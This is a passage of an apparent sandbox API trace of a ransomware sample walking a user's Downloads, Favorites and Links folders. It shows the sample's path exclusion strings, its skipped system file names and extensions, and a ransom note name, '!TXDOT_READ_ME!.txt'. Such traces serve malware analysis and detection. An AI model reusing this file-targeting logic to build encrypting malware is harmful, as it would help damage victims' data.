(lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\boot\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\perflogs\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\programdata\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\drivers\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\wsus\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="crypt_detect") returned 0x0 [0074.824] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="cryptolocker") returned 0x0 [0074.825] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="ransomware") returned 0x0 [0074.825] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\WINDOWS") returned 0x0 [0074.825] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.825] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\Program Files") returned 0x0 [0074.825] GetProcessHeap () returned 0xe30000 [0074.825] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed0058 [0074.825] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Downloads", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0074.825] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Downloads", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Downloads\\*") returned="C:\\Users\\FD1HVy\\Downloads\\*" [0074.825] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0074.825] StrCmpW (psz1=".", psz2=".") returned 0 [0074.825] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.825] StrCmpW (psz1="..", psz2=".") returned 1 [0074.825] StrCmpW (psz1="..", psz2="..") returned 0 [0074.825] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.825] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0074.825] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0074.825] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0074.825] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0074.825] GetProcessHeap () returned 0xe30000 [0074.825] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0074.825] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0074.825] StrCmpW (psz1="Favorites", psz2=".") returned 1 [0074.826] StrCmpW (psz1="Favorites", psz2="..") returned 1 [0074.826] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0074.826] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0074.826] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Favorites", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\system32\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\system\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\local\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\boot\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\perflogs\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\programdata\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\drivers\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\wsus\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="crypt_detect") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="cryptolocker") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="ransomware") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\WINDOWS") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.826] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="C:\\Program Files") returned 0x0 [0074.826] GetProcessHeap () returned 0xe30000 [0074.826] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed0058 [0074.826] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0074.826] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\*") returned="C:\\Users\\FD1HVy\\Favorites\\*" [0074.826] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2670 [0074.827] StrCmpW (psz1=".", psz2=".") returned 0 [0074.827] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.827] StrCmpW (psz1="..", psz2=".") returned 1 [0074.827] StrCmpW (psz1="..", psz2="..") returned 0 [0074.827] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43598c8e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43b9f870, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x43b9f870, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0074.827] StrCmpW (psz1="Bing.url", psz2=".") returned 1 [0074.827] StrCmpW (psz1="Bing.url", psz2="..") returned 1 [0074.827] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0074.827] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\") returned="C:\\Users\\FD1HVy\\Favorites\\" [0074.827] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\", psz2="Bing.url", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Bing.url") returned="C:\\Users\\FD1HVy\\Favorites\\Bing.url" [0074.827] PathFindExtensionW (pszPath="Bing.url") returned=".url" [0074.827] StrCmpW (psz1=".url", psz2=".txd0t") returned 1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="bootsect.bak") returned -1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="iconcache.db") returned -1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="thumbs.db") returned -1 [0074.827] StrCmpIW (psz1="Bing.url", psz2=" ransomware ") returned 1 [0074.827] StrCmpIW (psz1="Bing.url", psz2=" ransom ") returned 1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="debug.txt") returned -1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="boot.ini") returned -1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="desktop.ini") returned -1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="autorun.inf") returned 1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="ntuser.dat") returned -1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="ntldr") returned -1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="ntdetect.com") returned -1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="bootfont.bin") returned -1 [0074.827] StrCmpIW (psz1="Bing.url", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.827] PathFindExtensionW (pszPath="Bing.url") returned=".url" [0074.827] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".url") returned=".url|.mui" [0074.828] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.828] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0074.828] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0074.828] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0074.828] StrCmpW (psz1="Links", psz2=".") returned 1 [0074.828] StrCmpW (psz1="Links", psz2="..") returned 1 [0074.828] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Favorites", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0074.828] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\") returned="C:\\Users\\FD1HVy\\Favorites\\" [0074.828] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\", psz2="Links", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\system32\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\system\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\local\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\boot\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\perflogs\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\programdata\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\drivers\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\wsus\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="crypt_detect") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="cryptolocker") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="ransomware") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\WINDOWS") returned 0x0 [0074.828] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.829] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites\\Links", lpSrch="C:\\Program Files") returned 0x0 [0074.829] GetProcessHeap () returned 0xe30000 [0074.829] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c0) returned 0xed31f0 [0074.829] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Favorites\\Links", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links") returned="C:\\Users\\FD1HVy\\Favorites\\Links" [0074.829] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Favorites\\Links", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\Favorites\\Links\\*") returned="C:\\Users\\FD1HVy\\Favorites\\Links\\*" [0074.829] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec24b0 [0074.829] StrCmpW (psz1=".", psz2=".") returned 0 [0074.829] FindNextFileW (in: hFindFile=0xec24b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.829] StrCmpW (psz1="..", psz2=".") returned 1 [0074.829] StrCmpW (psz1="..", psz2="..") returned 0 [0074.829] FindNextFileW (in: hFindFile=0xec24b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.829] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0074.829] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0074.829] FindNextFileW (in: hFindFile=0xec24b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4360b38e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4360b38e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x4360b38e, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0074.829] FindClose (in: hFindFile=0xec24b0 | out: hFindFile=0xec24b0) returned 1 [0074.829] GetProcessHeap () returned 0xe30000 [0074.829] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0074.829] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd449a79e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3be1eb23, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0 [0074.829] FindClose (in: hFindFile=0xec2670 | out: hFindFile=0xec2670) returned 1 [0074.829] GetProcessHeap () returned 0xe30000 [0074.829] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0074.829] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0074.830] StrCmpW (psz1="Links", psz2=".") returned 1 [0074.830] StrCmpW (psz1="Links", psz2="..") returned 1 [0074.830] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0074.830] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0074.830] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Links", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\system32\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\system\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\local\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\boot\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\perflogs\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\programdata\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\drivers\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\wsus\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="crypt_detect") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="cryptolocker") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="ransomware") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\WINDOWS") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.830] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Links", lpSrch="C:\\Program Files") returned 0x0 [0074.830] GetProcessHeap () returned 0xe30000 [0074.830] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xed0058 [0074.830] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Links", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links") returned="C:\\Users\\FD1HVy\\Links" [0074.830] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Links", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Links\\*") returned="C:\\Users\\FD1HVy\\Links\\*" [0074.831] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Links\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9463e5c0, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x9463e5c0, 